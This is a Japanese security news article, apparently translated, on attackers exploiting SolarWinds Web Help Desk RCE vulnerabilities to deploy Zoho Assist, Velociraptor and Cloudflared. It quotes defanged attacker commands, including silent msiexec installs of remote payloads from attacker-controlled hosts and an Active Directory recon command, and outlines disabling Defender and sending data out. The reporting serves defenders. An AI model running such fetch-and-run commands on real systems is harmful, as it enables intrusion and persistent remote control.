Hackers Actively Exploiting SolarWinds Web Help Desk RCE Vulnerability to Deploy Custom Tools
2026/02/09 CyberSecurityNews — SolarWinds Web Help Desk (WHD) における、リモート・コード実行 (RCE) の脆弱性 CVE-2025-26399/CVE-2025-40536/CVE-2025-40551 の積極的な悪用が確認されている。攻撃者たちは、侵害したインスタンスを悪用することで、正規のツールでありながら悪用が多発している、Zoho Assist や Velociraptor などの管理ツールを、攻撃のための武器として展開している。
Huntress の観測によると、同社のパートナー基盤内の 78 組織をカバーする、84 台のエンドポイントで SolarWinds Web Help Desk が稼働し、広範な攻撃対象領域が露出している状況にあるという。 Huntress が確認しているのは、侵害された WHD サービスに起因するポスト・エクスプロイト活動である。
この攻撃チェーンは、WHD サービス・ラッパーである “wrapper.exe” が、基盤となる Tomcat ベースのアプリケーションである “java.exe” を起動するところから始まった。続いて、この Java プロセスが “cmd.exe” を実行し、リモート MSI ペイロードをサイレント・インストールしている。
msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
このペイロードは、Catbox ファイル・ホスティング・サービス経由で段階的に配布され、Zoho ManageEngine RMM (Zoho Assist) エージェントを展開した。Zoho Assist は正規のリモート管理ツールであるが、永続的な無人アクセスを提供する特性から、ポスト・エクスプロイトで悪用されやすい性質を持つ。このインシデントでは、攻撃者の Proton Mail アドレスに紐付く、Zoho アカウントに登録されたエージェントが、即時の対話と制御を可能にしていた。
2月6日付のアドバイザリで Microsoft が公開した、「SolarWinds WHD の脆弱性が侵害され、実環境での RCE および後続ツールの展開で悪用されている」という内容と、これらの活動は一致している。
偵察および横展開
この RMM エージェントを稼働させた脅威アクターは、キーボードによる直接操作のフェーズへ移行した。具体的に言うと、Zoho RMM プロセス (TOOLSIQ.EXE) を実行コンテキストとして悪用し、Active Directory の偵察を開始していく。
net group "domain computers" /do
この偵察による情報の列挙は、ドメイン参加システムを把握し、優先度の高い標的を選別するという、横方向への移動に先立つ典型的な前段階である。 こうして偵察を終了した攻撃者は、別のサイレント MSI インストーラを介して、オープンソース DFIR プラットフォームである Velociraptor を展開する。このインストーラは、攻撃者が管理する Supabase バケットにホストされている。
msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi
Velociraptor は防御側向けに設計されたツールであるが、コマンド実行/アーティファクト収集/エンドポイントの遠隔制御などの機能を備えているため、それらが悪用されると、効果的な C2 フレームワークとして機能してしまう。観測されたデプロイメント (展開) では、Velociraptor バージョン 0.73.4 が悪用されていた。既知の権限昇格の脆弱性を抱える旧式リリースであり、過去のキャンペーンとの共通点も確認されている。
Velociraptor クライアントは、Cloudflare Worker の背後にホストされた攻撃者のインフラ “auth.qgtxtebl.workers[.]dev” と通信していた。この通信パターンは、過去における ToolShell の悪用や Warlock ランサムウェア活動と関連付けられるものだ。
Velociraptor が Windows サービスとして稼働すると、攻撃者は Base64 エンコードされた PowerShell コマンドを高速かつ連続的に実行した。このコマンドによるレジストリの改変が行われ、Windows Defender/Windows Firewall が無効化された直後に、GitHub の公式リリース・チャネルから Cloudflared がインストールされる。その結果として、トンネル型の二次アクセス経路が構築され、いずれかの C2 チャネルが遮断された場合でも冗長性が確保される構成が成立する。
特に注目すべき点として挙げられるのは、攻撃者が Get-ComputerInfo を用いて詳細なシステム情報を収集し、Elastic Cloud の Bulk API を介して、攻撃者が管理する Elastic 環境へデータを送信していたことだ。実質的に、攻撃者は Elastic の SIEM ツール自体を流用し、集中管理およびトリアージ基盤を構築するという、防御ツールを逆手に取った象徴的なトレード・クラフトを示している。
このキャンペーンが示すのは、インターネットに露出した単一の管理インターフェイスを起点として、信頼済みのツールの管理ノイズに紛れ込みながら、完全な対話型制御/永続化/エンタープライズ全体の可視化へと、きわめて短時間のうちに移行していく手口である。
SolarWinds Web Help Desk を運用する組織に対して強く推奨されるのは、CVE-2025-26399/CVE-2025-40536/CVE-2025-40551 を修正したバージョン 2026.1 以降へと、緊急でアップデートすることだ。
さらに、管理インターフェイスのインターネット直接露出を排除し、資格情報のローテーションを実施すべきである。それに加えて、WHD プロセスに関連する不正なリモート・アクセスツール/サイレント MSI インストール/エンコードされた PowerShell 実行の有無について、ホストベースで精査する必要がある。
SolarWinds Web Help Desk が悪用され続けている現状を踏まえると、防御側に対して求められるのは、能動的なスキャンと迅速な武器化を前提とした対応となる。
SolarWinds Web Help Desk (WHD) に存在する、複数の深刻な脆弱性を悪用するサイバー攻撃について解説する記事です。この問題の原因は、WHD の Java ベースのアプリケーション処理において、外部からの入力を適切に制限できず、リモートから任意のコマンドを実行させてしまう設計上の欠陥にあります。具体的には、攻撃者が脆弱なエンドポイントへ細工したリクエストを送ると、WHD の実行プロセス (java.exe) が子プロセスとしてコマンド・プロンプト (cmd.exe) を起動してしまい、外部から不正なプログラムが攻撃者の指示通りにインストールされてしまいます。脆弱性の観点では、CVE-2025-26399/CVE-2025-40536/CVE-2025-40551 が特定されており、すでに実環境での悪用が確認されています。攻撃者は WHD への侵害を足掛かりに、Zoho Assist や Velociraptor といった正規の管理ツールを武器として導入し、セキュリティ製品を無効化しながらネットワーク全体を支配しようとします。ご利用のチームは、ご注意ください。よろしければ、SolarWinds Web Help Desk での検索結果も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.